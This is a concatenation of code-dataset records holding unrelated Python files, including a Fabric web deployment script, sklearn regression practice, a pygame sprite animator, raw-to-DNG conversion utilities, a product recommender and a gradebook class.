transfers a specific file \"\"\"\n put('./0-setup_web_static.sh', '/tmp/')\n\n\ndef do_pack():\n \"\"\"\n Generates a .tgz archive from the contents of web_static folder\n Return: the archive path if the archive has been correctly generated\n Otherwise Return: None\n \"\"\"\n local(\"mkdir -p ./versions\")\n res = local(\"tar czvf ./versions/web_static_{}.tgz\\\n ./web_static/*\".format(date))\n if res.succeeded:\n return \"./versions/web_static_{}.tgz\".format(date)\n else:\n return None\n\n\ndef do_deploy(archive_path):\n \"\"\" Distributes an archive to multiple webservers \"\"\"\n try:\n if not archive_path:\n return False\n try:\n name = archive_path.split('/')[-1]\n except:\n name = archive_path\n\n put(archive_path, '/tmp/')\n run(\"mkdir -p /data/web_static/releases/{}/\".format(name[:-4]))\n with cd('/tmp/'):\n run('tar xzf {} -C /data/web_static/releases/{}/'.format(name,\n name[:-4]))\n sudo('rm ./{}'.format(name))\n with cd('/data/web_static/'):\n run('mv releases/{}/web_static/*\\\n /data/web_static/releases/{}/'\n .format(name[:-4], name[:-4]))\n run('rm -rf ./current')\n run('ln -s /data/web_static/releases/{}/\\\n /data/web_static/current'.format(name[:-4]))\n return True\n except:\n return False\n\n\ndef deploy():\n \"\"\" Fabric Script: Distributes an archive to the web servers\n \"\"\"\n \"\"\"call do_pack and store the path of the created archive\n return false if no archive has been created\n call do_deploy(archive_path) using the new path of the new archive\n return the value of do_deploy\n \"\"\"\n\n path = do_pack()\n if path is None:\n return False\n result = do_deploy(path)\n return result\n","sub_path":"3-deploy_web_static.py","file_name":"3-deploy_web_static.py","file_ext":"py","file_size_in_byte":2211,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"254783197","text":"import pandas as pd\r\nfrom sklearn.preprocessing import MinMaxScaler\r\nfrom sklearn.linear_model import LinearRegression\r\nfrom sklearn.model_selection import train_test_split\r\nfrom sklearn.metrics import mean_absolute_error, r2_score, mean_squared_error\r\nimport numpy as np\r\nfrom sklearn.linear_model import Lasso, Ridge\r\n\r\n\r\ndf = pd.read_csv('energydata_complete.csv')\r\nnew_df = df.drop(columns = ['date','lights'])\r\n\r\none_df = new_df[['T2','T6','Appliances']]\r\n\r\nscaler = MinMaxScaler()\r\nnorm_df = pd.DataFrame(scaler.fit_transform(new_df), columns=new_df.columns)\r\nfeatures = norm_df.drop(columns = 'Appliances')\r\ntarget = norm_df['Appliances']\r\n\r\nx_train, x_test, y_train, y_test = train_test_split(features, target, test_size=0.3, random_state=42)\r\nlinear_model = LinearRegression()\r\nlinear_model.fit(x_train,y_train)\r\npredict = linear_model.predict(x_test)\r\n\r\nr2_score = r2_score(y_test, predict)\r\nround(r2_score, 2)\r\n\r\nmae = mean_absolute_error(y_test, predict)\r\nround(mae, 2)\r\n\r\nrss = np.sum(np.square(y_test - predict))\r\nround(rss, 2)\r\n\r\nrmse = np.sqrt(mean_squared_error(y_test, predict))\r\nround(rmse, 3)\r\n\r\ndef get_weights_df(model, feat, col_name):\r\n #this function returns the weight of every feature\r\n weights = pd.Series(model.coef_, feat.columns).sort_values()\r\n weights_df = pd.DataFrame(weights).reset_index()\r\n weights_df.columns = ['Features', col_name]\r\n weights_df[col_name].round(3)\r\n return weights_df\r\n\r\nlinear_model_weights = get_weights_df(linear_model, x_train, 'Linear_Model_Weight')\r\nridge_weights_df = get_weights_df(ridge_reg, x_train, 'Ridge_Weight')\r\nlasso_weights_df = get_weights_df(lasso_reg, x_train, 'Lasso_weight')\r\n\r\nfinal_weights = pd.merge(linear_model_weights, ridge_weights_df, on='Features')\r\nfinal_weights = pd.merge(final_weights, lasso_weights_df, on='Features')\r\nfinal_weights\r\n","sub_path":"hamoye_quiz.py","file_name":"hamoye_quiz.py","file_ext":"py","file_size_in_byte":1832,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"599091222","text":"\"\"\"\nAnimator Class\nWorks with single sprite sheet and an atlas file\n\nCreated: Jul 30, 2018\n@author: rmainer\n\"\"\"\nimport pygame\n\n\ndef prepare_animations(spritesheet_file, atlas_file, sprite_size=None):\n\n sprite_sheet = pygame.image.load(spritesheet_file).convert_alpha()\n\n if atlas_file is None:\n atlas_file = spritesheet_file.replace(\"png\", \"txt\")\n \n with open(atlas_file, \"r\") as f:\n lines = f.readlines() # read entire file\n\n animation_dictionary = {}\n\n for line in lines:\n # Line example: air-attack1-00 = 0 38 50 37\n action_key, rect_vals = line.split(\" = \") # (air-attack1-00, 0 38 50 37)\n action = action_key.split(\"-\")[:-1] # [air, attack1]\n\n if len(action) > 1:\n action = \"-\".join(action) # air-attack1\n else:\n action = action[0] # action is list...\n\n if action not in animation_dictionary.keys():\n animation_dictionary[action] = [] # create a new list of sprites\n\n r = pygame.Rect(tuple([int(s) for s in rect_vals.split(' ')])) # create a rect for sprite in sheet\n sprite = sprite_sheet.subsurface(r) # get sprite as subsurface\n\n if sprite_size is not None:\n sprite = pygame.transform.scale(sprite, sprite_size)\n\n animation_dictionary[action].append(sprite) # add to list\n\n return animation_dictionary\n\n\nclass Animator(object):\n\n def __init__(self, spritesheet_file, atlas_file=None, sprite_size=None):\n self.__animation_dict = prepare_animations(spritesheet_file, atlas_file, sprite_size)\n self.__animation_key = \"\" # animation key (name)\n self.__sprite_index = 0 # index of current sprite in animation list of sprites\n\n def get_animation_key(self):\n return self.__animation_key\n\n def get_sprite_index(self):\n return self.__sprite_index\n\n def flip_sprites_ver(self):\n \"\"\"\n Flips the x axis of the sprites in the animation dict\n \"\"\"\n for action_key, sprites_list in self.__animation_dict.items():\n for i in range(0, len(sprites_list)):\n sprite = sprites_list[i]\n self.__animation_dict[action_key][i] = pygame.transform.flip(sprite, True, False)\n return self.__animation_dict\n\n def get_next_sprite(self, animation_key: str) -> pygame.Surface:\n \"\"\"\n Returns the next sprite in the animation\n :param animation_key:\n :return: surface\n \"\"\"\n\n if animation_key != self.__animation_key:\n # if changed to new animation, update key and reset sprite index\n self.__animation_key = animation_key\n self.__sprite_index = 0\n else:\n self.__sprite_index += 1\n if self.__sprite_index == len(self.__animation_dict[self.__animation_key]):\n self.__sprite_index = 0\n\n return self.__animation_dict[self.__animation_key][self.__sprite_index]\n\n def get_last_sprite(self) -> pygame.Surface:\n \"\"\"\n Returns the last sprite in sprite list\n For example, if character died\n :return: surface\n \"\"\"\n return self.__animation_dict[self.__animation_key][-1]\n\n def reset_animation(self):\n self.__sprite_index = 0\n\n\nif __name__ == \"__main__\":\n import os\n\n SCREEN_SIZE = (480, 320)\n FPS = 60\n BLACK = (0, 0, 0)\n SPRITE_SHEET = os.path.join(\"..\", \"Assets\", \"adventurer_sprite_sheet.png\")\n ATLAS = os.path.join(\"..\", \"Assets\", \"adventurer_sprite_sheet.txt\")\n SIZE = (200, 148)\n ACTION = \"bow\"\n INTERVAL = .10 # how long one single sprite should be displayed in seconds\n\n pygame.init()\n screen = pygame.display.set_mode(SCREEN_SIZE)\n clock = pygame.time.Clock()\n playtime = 0\n cycletime = 0\n\n animator = Animator(SPRITE_SHEET, ATLAS, sprite_size=SIZE)\n\n while 1:\n milliseconds = clock.tick(FPS) # ms passed since last tick/frame\n seconds = milliseconds / 1000.0 # seconds since last tick/frame\n playtime += seconds\n cycletime += seconds\n if cycletime > INTERVAL:\n image = animator.get_next_sprite(ACTION)\n size = image.get_rect().size\n screen.fill(BLACK)\n screen.blit(image, (SCREEN_SIZE[0]/2 - size[0]/2, SCREEN_SIZE[1]/2 - size[1]/2))\n cycletime = 0\n\n pygame.display.set_caption(\"[FPS]: %.2f picture: %i\" % (clock.get_fps(), animator.get_sprite_index()))\n pygame.display.flip()\n","sub_path":"Graphics/Animator.py","file_name":"Animator.py","file_ext":"py","file_size_in_byte":4474,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"339530695","text":"#\n# @lc app=leetcode id=416 lang=python3\n#\n# [416] Partition Equal Subset Sum\n#\nclass Solution:\n def canPartition(self, nums: List[int]) -> bool:\n if not nums:\n return False\n s = sum(nums)\n if s%2: return False\n target = s // 2\n dp = [[False for _ in range(target+1)] for _ in range(len(nums)+1)]\n dp[0][0] = True\n for i in range(1, len(nums)+1):\n dp[i][0] = True\n for i in range(1, len(nums)+1):\n for j in range(1, target+1):\n if j >= nums[i-1]:\n dp[i][j] = dp[i-1][j]| dp[i-1][j-nums[i-1]]\n ### dp[i-1][j] 不把nums[i-1]进组是否有效\n ### dp[i-1][j-nums[i-1]] 把nums[i-1]进组是否有效\n else:\n dp[i][j] = dp[i-1][j]\n return dp[-1][-1]\n\n\n","sub_path":"416.partition-equal-subset-sum.py","file_name":"416.partition-equal-subset-sum.py","file_ext":"py","file_size_in_byte":855,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"375506730","text":"from PyQt5.QtWidgets import QMainWindow, QApplication, QMessageBox\nfrom PyQt5 import uic\n\n\nclass MiVentana(QMainWindow):\n def __init__(self):\n super().__init__()\n uic.loadUi(\"message_box.ui\", self)\n self.mensaje.clicked.connect(self.on_mensaje)\n\n def on_mensaje(self):\n msg = QMessageBox()\n msg.setWindowTitle('Titulo de mensaje')\n msg.setText('Este es un mensaje')\n # msg.setIcon(QMessageBox.Critical)\n # msg.setIcon(QMessageBox.Warning)\n # msg.setIcon(QMessageBox.Information)\n msg.setIcon(QMessageBox.Question)\n # msg.setStandardButtons(\n # QMessageBox.Yes | QMessageBox.No | QMessageBox.Cancel | QMessageBox.Ok | QMessageBox.Open | QMessageBox.Close | QMessageBox.Save | QMessageBox.SaveAll | QMessageBox.Abort | QMessageBox.Retry | QMessageBox.Ignore)\n msg.setStandardButtons(\n QMessageBox.Yes | QMessageBox.No | QMessageBox.Cancel)\n\n respuesta = msg.exec_()\n if respuesta == QMessageBox.Yes:\n print('Se eligio si')\n elif respuesta == QMessageBox.No:\n print('Se eligio no')\n else:\n print('Se eligio cancelar')\n\n\napp = QApplication([])\n\nwin = MiVentana()\nwin.show()\n\napp.exec_()\n","sub_path":"Python/PyQT5/Elementos/Message_Box/message_box.py","file_name":"message_box.py","file_ext":"py","file_size_in_byte":1252,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"615205871","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\"\"\"\nConversion Process\n==================\n\nDefines the conversion process objects:\n\n- :func:`convert_raw_files_to_dng_files`\n- :func:`convert_dng_files_to_intermediate_files`\n\"\"\"\n\nfrom __future__ import division, unicode_literals\n\nimport logging\nimport os\nimport platform\nimport re\nimport shlex\nimport subprocess\n\nfrom colour_hdri.utilities import path_exists\n\n__author__ = 'Colour Developers'\n__copyright__ = 'Copyright (C) 2015-2016 - Colour Developers'\n__license__ = 'New BSD License - http://opensource.org/licenses/BSD-3-Clause'\n__maintainer__ = 'Colour Developers'\n__email__ = 'colour-science@googlegroups.com'\n__status__ = 'Production'\n\n__all__ = ['RAW_CONVERTER',\n 'RAW_CONVERSION_ARGUMENTS',\n 'RAW_D_CONVERSION_ARGUMENTS',\n 'DNG_CONVERTER',\n 'DNG_CONVERSION_ARGUMENTS',\n 'convert_raw_files_to_dng_files',\n 'convert_dng_files_to_intermediate_files']\n\nLOGGER = logging.getLogger(__name__)\n\nRAW_CONVERTER = 'dcraw'\n\"\"\"\nCommand line raw conversion application, usually Dave Coffin's *dcraw*.\n\nRAW_CONVERTER : unicode\n\"\"\"\n\nRAW_CONVERSION_ARGUMENTS = '-t 0 -D -W -4 -T \"{0}\"'\n\"\"\"\nArguments for the command line raw conversion application for non demosaiced\nlinear *tiff* file format output.\n\nRAW_CONVERSION_ARGUMENTS : unicode\n\"\"\"\n\nRAW_D_CONVERSION_ARGUMENTS = '-t 0 -H 1 -r 1 1 1 1 -4 -q 3 -o 0 -T \"{0}\"'\n\"\"\"\nArguments for the command line raw conversion application for demosaiced\nlinear *tiff* file format output.\n\nRAW_D_CONVERSION_ARGUMENTS : unicode\n\"\"\"\n\nif platform.system() in ('Windows', 'Microsoft'):\n DNG_CONVERTER = 'C:\\\\Program Files (x86)\\\\Adobe\\\\Adobe DNG Converter.exe'\n \"\"\"\n Command line *DNG* conversion application, usually *Adobe DNG Converter*.\n\n DNG_CONVERTER : unicode\n \"\"\"\nelif platform.system() == 'Darwin':\n DNG_CONVERTER = ('/Applications/Adobe DNG Converter.app/Contents/'\n 'MacOS/Adobe DNG Converter')\n \"\"\"\n Command line *dng* conversion application, usually *Adobe DNG Converter*.\n\n DNG_CONVERTER : unicode\n \"\"\"\nelse:\n DNG_CONVERTER = None\n \"\"\"\n Command line *dng* conversion application, usually *Adobe DNG Converter*.\n\n DNG_CONVERTER : unicode\n \"\"\"\n\nDNG_CONVERSION_ARGUMENTS = '-e -d \"{0}\" \"{1}\"'\n\"\"\"\nArguments for the command line *dng* conversion application.\n\nDNG_CONVERSION_ARGUMENTS : unicode\n\"\"\"\n\n\ndef convert_raw_files_to_dng_files(raw_files, output_directory):\n \"\"\"\n Converts given raw files to *dng* files using given output directory.\n\n Parameters\n ----------\n raw_files : array_like\n Raw files to convert to *dng* files.\n output_directory : unicode\n Output directory.\n\n Returns\n -------\n list\n *dng* files.\n \"\"\"\n\n dng_files = []\n for raw_file in raw_files:\n raw_file_extension = os.path.splitext(raw_file)[1]\n dng_file = os.path.join(output_directory, os.path.basename(\n re.sub('{0}$'.format(raw_file_extension), '.dng', raw_file)))\n\n path_exists(dng_file) and os.remove(dng_file)\n\n LOGGER.info(\n 'Converting \"{0}\" file to \"{1}\" file.'.format(raw_file, dng_file))\n\n command = [DNG_CONVERTER] + shlex.split(\n DNG_CONVERSION_ARGUMENTS.format(output_directory, raw_file),\n posix=(False\n if platform.system() in (\"Windows\", \"Microsoft\") else\n True))\n\n subprocess.call(command)\n\n dng_files.append(dng_file)\n\n return dng_files\n\n\ndef convert_dng_files_to_intermediate_files(dng_files,\n output_directory,\n demosaicing=False):\n \"\"\"\n Converts given *dng* files to intermediate *tiff* files using given output\n directory.\n\n Parameters\n ----------\n dng_files : array_like\n *dng* files to convert to intermediate *tiff* files.\n output_directory : str\n Output directory.\n demosaicing : bool\n Perform demosaicing on conversion.\n\n Returns\n -------\n list\n Intermediate *tiff* files.\n \"\"\"\n\n intermediate_files = []\n for dng_file in dng_files:\n intermediate_file = re.sub('\\.dng$', '.tiff', dng_file)\n\n path_exists(intermediate_file) and os.remove(intermediate_file)\n\n LOGGER.info('Converting \"{0}\" file to \"{1}\" file.'.format(\n dng_file, intermediate_file))\n\n raw_conversion_arguments = (RAW_D_CONVERSION_ARGUMENTS\n if demosaicing else\n RAW_CONVERSION_ARGUMENTS)\n command = [RAW_CONVERTER] + shlex.split(\n raw_conversion_arguments.format(dng_file),\n posix=(False\n if platform.system() in (\"Windows\", \"Microsoft\") else\n True))\n\n subprocess.call(command)\n\n tiff_file = os.path.join(\n output_directory, os.path.basename(intermediate_file))\n if tiff_file != intermediate_file:\n path_exists(tiff_file) and os.remove(tiff_file)\n os.rename(intermediate_file, tiff_file)\n\n intermediate_files.append(tiff_file)\n\n return intermediate_files\n","sub_path":"colour_hdri/process/conversion.py","file_name":"conversion.py","file_ext":"py","file_size_in_byte":5216,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"174678185","text":"from django.conf.urls import include, url\nfrom django.contrib import admin\nfrom rest_framework import routers\nfrom probability_calculator import views\n\n\nrouter = routers.DefaultRouter()\nrouter.register(r'physical_objects', views.PhysicalObjectViewSet)\nrouter.register(\n r'probabilities',\n views.ProbabilityViewSet,\n base_name='probability',\n)\nurlpatterns = router.urls\n\nurlpatterns += [\n url(r'^admin/', include(admin.site.urls)),\n]\n","sub_path":"tunneling_probabilities/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":445,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"411885990","text":"#Write a Python script to check if a given key already exists in a dictionary \n\ndic = {\"Student1\":\"Hafeez\",\"Student2\":\"Sameer\",\"Student3\":\"Asad\",\"Student4\":\"Mehmood\",\"Student5\":\"Hamza\"}\nduplicate = {}\nprint(dic)\nkey = \"Student1\"\nif key in dic.keys(): \n print(key,\" is present and his name is \",dic[key])\nelse:\n print(\"Not present\")","sub_path":"assignment_3/answer_6.py","file_name":"answer_6.py","file_ext":"py","file_size_in_byte":345,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"578861299","text":"# -*- coding: utf-8 -*-\n\n\"\"\"Unittests for Janitoo-Raspberry Pi Server.\n\"\"\"\n__license__ = \"\"\"\n This file is part of Janitoo.\n\n Janitoo is free software: you can redistribute it and/or modify\n it under the terms of the GNU General Public License as published by\n the Free Software Foundation, either version 3 of the License, or\n (at your option) any later version.\n\n Janitoo is distributed in the hope that it will be useful,\n but WITHOUT ANY WARRANTY; without even the implied warranty of\n MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n GNU General Public License for more details.\n\n You should have received a copy of the GNU General Public License\n along with Janitoo. If not, see <http://www.gnu.org/licenses/>.\n\n\"\"\"\n__author__ = 'Sébastien GALLET aka bibi21000'\n__email__ = 'bibi21000@gmail.com'\n__copyright__ = \"Copyright © 2013-2014-2015-2016 Sébastien GALLET aka bibi21000\"\n\nimport warnings\nwarnings.filterwarnings(\"ignore\")\n\nimport time\n\nfrom janitoo_nosetests.server import JNTTServer, JNTTServerCommon\nfrom janitoo.utils import HADD_SEP, HADD\nfrom janitoo.thread import JNTBusThread\nfrom janitoo_raspberry.server import PiServer\n\nclass TestTutorialServer(JNTTServer, JNTTServerCommon):\n \"\"\"Test the tutorial server\n \"\"\"\n server_class = PiServer\n server_conf = \"tests/data/helloworldv4.conf\"\n server_section = \"tutorial4\"\n\n hadds = [HADD%(225,0), HADD%(225,1), HADD%(225,2), HADD%(225,3), HADD%(225,4)]\n\n def test_040_server_start_no_error_in_log(self):\n self.onlyRasperryTest()\n JNTTServerCommon.test_040_server_start_no_error_in_log(self)\n\n def test_100_server_start_machine_state(self):\n self.start()\n time.sleep(10)\n thread = self.server.find_thread(self.server_section)\n self.assertNotEqual(thread, None)\n self.assertIsInstance(thread, JNTBusThread)\n bus = thread.bus\n self.assertNotEqual(bus, None)\n self.waitHeartbeatNodes(hadds=self.hadds)\n self.assertFsmBoot()\n bus.wakeup()\n time.sleep(2)\n bus.sleep()\n time.sleep(2)\n bus.report()\n time.sleep(15)\n bus.ring()\n time.sleep(15)\n bus.report()\n time.sleep(2)\n bus.sleep()\n","sub_path":"tests/test_server_v4.py","file_name":"test_server_v4.py","file_ext":"py","file_size_in_byte":2266,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"195528260","text":"import time\nimport re,urbandict\n\nfrom lib import Plugin\nplgn = Plugin('dictionay')\n\n\n@plgn.command('define (?P<what>[-a-zA-Z]+)')\ndef temp(data, what):\n\tfinal=\"\"\n\td=urbandict.define(str(what))\n\tfor item in d:\n\t\tfinal =final + item['def'] \n\treturn final\n\n@plgn.command('use (?P<what>[-a-zA-Z]+)')\ndef temp(data, what):\n\tfinal=\"\"\n\td=urbandict.define(str(what))\n\tfor item in d:\n\t\tfinal =final + item['example'] \n\treturn final\n","sub_path":"plugins/repeat/dictionary.py","file_name":"dictionary.py","file_ext":"py","file_size_in_byte":423,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"574204973","text":"import yaml\nfrom utils import load_data, trim_id\nfrom logic.data_preparation import prepare_unlabeled_data\nfrom logic.prediction import get_recommended_product \n\n\nclass Predictor():\n def __init__(self, config_path='config/step3_prediction.yaml'):\n # General attributes\n with open(config_path) as stream:\n self.config = yaml.safe_load(stream)\n \n self.complete_data = \\\n load_data(self.config['input']['complete_data_path'])\n self.data = load_data(self.config['input']['data_path'])\n self.model = load_data(self.config['input']['model_path'])\n self.encoders = load_data(self.config['input']['encoder_path'])\n self.columns_dict = \\\n load_data(self.config['input']['classifier_columns_path'])\n\n self.product_recommendation_tables = \\\n load_data(self.config['input']['product_recommendation_table_path'])\n\n def predict_category_random(self, sample_size=5, to_print=True):\n sample = self.complete_data.sample(n=sample_size, random_state=None)\n # Generates product category prediction for a random sample \n # of the complete data\n prepared_data = prepare_unlabeled_data(sample, self.columns_dict, \n self.encoders)\n \n if to_print:\n print(f'Running prediction for sample:\\n{sample}')\n predictions = self.model.predict(prepared_data)\n \n label_encoder = self.encoders['label_encoder']\n predictions_string = \\\n label_encoder.inverse_transform(predictions.astype(int))\n if to_print:\n print(f'\\nPredictions:\\n{predictions_string}')\n \n sample['predicted_category'] = predictions_string\n\n return sample\n\n def predict_product_random(self, sample_size=2, product_number=3, estimation_n=5):\n category_predictions = \\\n self.predict_category_random(sample_size=sample_size,\n to_print=False)\n recommendations = {}\n for _, row in category_predictions.iterrows():\n recommendation = get_recommended_product(row, self.complete_data,\n self.product_recommendation_tables,\n product_number=product_number,\n estimation_n=estimation_n)\n\n recommendations[row['customer_unique_id']] = recommendation\n\n return category_predictions, recommendations\n\n def print_product_recommendation(self, sample_size=2, verbose=False,\n product_number=3, estimation_number=5):\n # Prints predictions per customer for a given sample size\n # Based on verbosity it will either print previous category, predicted\n # category and recommended product information, or it will print all the\n # customer's order info and other features as well.\n category_prediction, recommendations = \\\n self.predict_product_random(sample_size=sample_size,\n product_number=product_number,\n estimation_n=1000)\n\n # Loop through customers\n for _, row in category_prediction.iterrows():\n customer = row['customer_unique_id']\n previous_category = row['product_category_name']\n predicted_category = row['predicted_category']\n rec_customer = recommendations[customer]\n\n left_column = 35\n right_column = 15\n print(f'{\"Predictions for customer:\":<{left_column}}'\n f'{trim_id(customer):>{right_column}}')\n print(f'{\"Last purchase product category:\":<{left_column}}'\n f'{previous_category:>{right_column}}')\n print(f'{\"Predicted next product category:\":<{left_column}}'\n f'{predicted_category:>{right_column}}')\n\n if verbose:\n print(f'\\nComplete data for order:\\n{row}\\n')\n\n print(f'\\n{\" Recommended products \":#^50}')\n review_scores = rec_customer['product_scores']\n estimations = rec_customer['expected_values']\n for product, estimation in estimations.items():\n price = estimation['estimated_price']\n shipping = estimation['shipping_price']\n shipping_time = estimation['estimated_delivery_time']\n review_score = review_scores[product]\n print(f'{\"Product:\":<{left_column}}'f'{trim_id(product):>{right_column}}')\n print(f'{\"Price + estimated shipping cost:\":<{left_column}}'\n f'{f\"{price:.2f} + {shipping:.2f}R$\":>{right_column}}')\n print(f'{\"Estimated delivery time:\":<{left_column}}'\n f'{f\"{shipping_time} days\":>{right_column}}')\n print(f'{\"Avg. review score:\":<{left_column}}'\n f'{review_score:>{right_column}.2f}')\n \n print(f'{\"\":#^50}\\n\\n')\n\n","sub_path":"pipeline/step3_prediction.py","file_name":"step3_prediction.py","file_ext":"py","file_size_in_byte":5089,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"186111240","text":"class Solution(object):\n def coinChange(self, coins, amount):\n \"\"\"\n :type coins: List[int]\n :type amount: int\n :rtype: int\n \n dp, O(amount* len(coins))\n intuitive answer, the one on leetcode may have optimization\n \"\"\"\n \n # dp[i][j] := minimum value achieved \n # by using first i items(here is coins) and \n # exact j weights(here is amounts)\n dp = [float('inf')] * (amount+1)\n dp[0] = 0 # using 0 items we can achieve 0 value \n N = len(coins)\n coins.insert(0,0)\n for i in range(1, N+1):\n for j in range(coins[i], amount+1):\n # temp = float('inf') if j-coins[i] < 0 else dp[j-coins[i]] + 1\n dp[j] = min(dp[j], dp[j-coins[i]] + 1)\n \n \n # we take the last one because we need to use all \n # the weights unlike 01knapsack we don't need to use \n # all the weights\n return dp[amount] if dp[amount] != float('inf') else -1\n ","sub_path":"leetcode/dp/13_coin_change.py","file_name":"13_coin_change.py","file_ext":"py","file_size_in_byte":1032,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"362248320","text":"import xlrd\nimport xlwt\nimport re\nimport os\n\nclass counter:\n def __init__(self):\n PATH = ''\n files = os.listdir()\n for f in files:\n if f.endswith('.xls'):\n data = f\n break\n \n workbook = xlrd.open_workbook(data, encoding_override='utf-8')\n self.worksheet = workbook.sheet_by_index(0)\n self.find_direction()\n self.take_all_dirs()\n self.delete_elements()\n self.dirs.sort()\n self.create_direction()\n self.count()\n \n\n def find_direction(self):\n for rownum in range(0, self.worksheet.nrows):\n row_values = self.worksheet.row_values(rownum)\n for num, col in enumerate(row_values):\n if col == 'Конкурсные группы':\n self.col = rownum + 1\n self.row = num\n elif col == 'Статус заявления':\n self.row_status = num\n\n\n def take_all_dirs(self):\n dirs = []\n for rownum in range(self.col, self.worksheet.nrows):\n row_values = self.worksheet.row_values(rownum)\n if row_values[self.row_status] in ['Новое', 'Принято']:\n dirs.append(row_values[self.row])\n self.dirs = dirs\n \n def delete_elements(self):\n dirs = []\n del_elements = ['/', 'ориг.', 'бак.', 'бюдж.', 'дог.', 'факультет экономики и права',\\\n 'емф', 'техн.', 'фак.', 'пед.', 'на базе впо']\n for i in self.dirs:\n i = i.lower()\n for j in del_elements:\n i = i.replace(j, '')\n i = ' '.join(i.split())\n #i = re.sub(\"^\\s+|\\n|\\r|\\s+$\", '', i)\n #i = re.sub('\\s+', ' ', i)\n dirs.append(i)\n self.dirs = dirs\n\n def create_direction(self):\n dirs = []\n dirs1 = list(self.dirs)\n dirs1 = list(set(dirs1))\n dirs1.sort()\n for i in dirs1:\n string = i.split(' - ')\n if len(i.split(' - ')) == 2:\n dirs.append(string[1])\n elif len(i.split(' - ')) > 2:\n for i in range(1, len(string) - 1):\n tmp = string[i].split(' [')\n tmp = tmp[0]\n dirs.append(tmp)\n self.dirs1 = list(set(dirs))\n self.dirs1.sort()\n\n '''\n for enum, element in enumerate(self.dirs):\n for i in range(enum + 1, len(self.dirs)):\n self.dirs[i] = self.dirs[i].replace(element, '')\n for i in self.dirs:\n if i != \"\":\n dirs.append(i)\n \n for i in dirs:\n print(i)'''\n def count(self):\n counted = {}\n for i in self.dirs1:\n counted[i] = 0\n for i in self.dirs1:\n for j in self.dirs:\n if i in j:\n counted[i] += 1\n \n for i in counted.keys():\n print(i, counted[i])\n print('Total:',sum(counted.values()))\n\n\n\n\nif __name__ == \"__main__\":\n counter()\n","sub_path":"2020/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3135,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"429436865","text":"from cx_Freeze import setup, Executable\r\nimport sys\r\nimport os\r\n\r\nos.environ['TCL_LIBRARY'] = 'C:\\\\Users\\\\camer\\\\AppData\\Local\\\\Programs\\\\Python\\\\Python36\\\\tcl\\\\tcl8.6'\r\nos.environ['TK_LIBRARY'] = 'C:\\\\Users\\\\camer\\\\AppData\\Local\\\\Programs\\\\Python\\\\Python36\\\\tcl\\\\tk8.6'\r\n\r\nsys.argv.append('build_exe')\r\n\r\nbase = None\r\n\r\nexecutables = [Executable(\"scraper.py\", base=base)]\r\n\r\npackages = [\"idna\", \"praw\", \"os\", \"time\",\r\n \"sys\", \"urllib.request\", \"ctypes\", \"shutil\"]\r\n \r\noptions = {\r\n 'build_exe': {\r\n 'packages': packages,\r\n },\r\n}\r\n\r\nsetup(\r\n options=options,\r\n version=\"0.3\",\r\n description='Reddit Scraper',\r\n executables=executables\r\n)\r\n","sub_path":"Packages/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":685,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"10909069","text":"class GradeBook:\n def __init__(self, student_name):\n self.student_name = student_name\n self.total_points = 0\n self.points_earned = 0\n self.grade_book_entries = {}\n\n def graded_assignment(self, assignment_name, assignment_points, assignment_earned_points):\n self.assignment_name = assignment_name\n self.assignment_points = assignment_points\n self.assignment_earned_points = assignment_earned_points\n self.assignment_grade = assignment_earned_points / assignment_points\n self.grade_book_entries.update({self.assignment_name: self.assignment_grade})\n self.total_points = self.total_points + self.assignment_points\n self.points_earned = self.points_earned + self. assignment_earned_points\n print(self.grade_book_entries)\n print(self.assignment_grade)\n\n def total_grade(self):\n self.grade = self.points_earned/self.total_points\n if .90 <= self.grade:\n self.letter_grade = \"A\"\n if .80 <= self.grade < .90:\n self.letter_grade = \"B\"\n if .70 <= self.grade < .80:\n self.letter_grade = \"C\"\n if .60 <= self.grade < .70:\n self.letter_grade = \"D\"\n if .60 > self.grade:\n self.letter_grade = \"F\"\n percent_grade = self.grade * 100\n print(\"\\n\" + self.student_name + \"\\n\" + \"Total grade: \" + str(('%.0f'%percent_grade)) + '%' + \"\\n\"\n + \"Letter grade: \" + self.letter_grade + \"\\n\")\n\n def look_up_grade(self, entry):\n self.entry = entry\n print(self.entry + \" : \" + str(float(self.grade_book_entries[self.entry])*100)+'%' + \"\\n\")\n","sub_path":"GradeBook.py","file_name":"GradeBook.py","file_ext":"py","file_size_in_byte":1649,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"638841455","text":"########################################################################################\n# Davi Frossard, 2016 #\n# VGG16 implementation in TensorFlow #\n# Details: #\n# http://www.cs.toronto.edu/~frossard/post/vgg16/ #\n# #\n# Model from https://gist.github.com/ksimonyan/211839e770f7b538e2d8#file-readme-md #\n# Weights from Caffe converted using https://github.com/ethereon/caffe-tensorflow #\n########################################################################################\n\nimport tensorflow as tf\nimport numpy as np\nfrom scipy.misc import imread, imresize\nfrom KaggleLearn.DogVsCat.imagenet_classes import class_names\n\n\nclass vgg16_getv:\n def 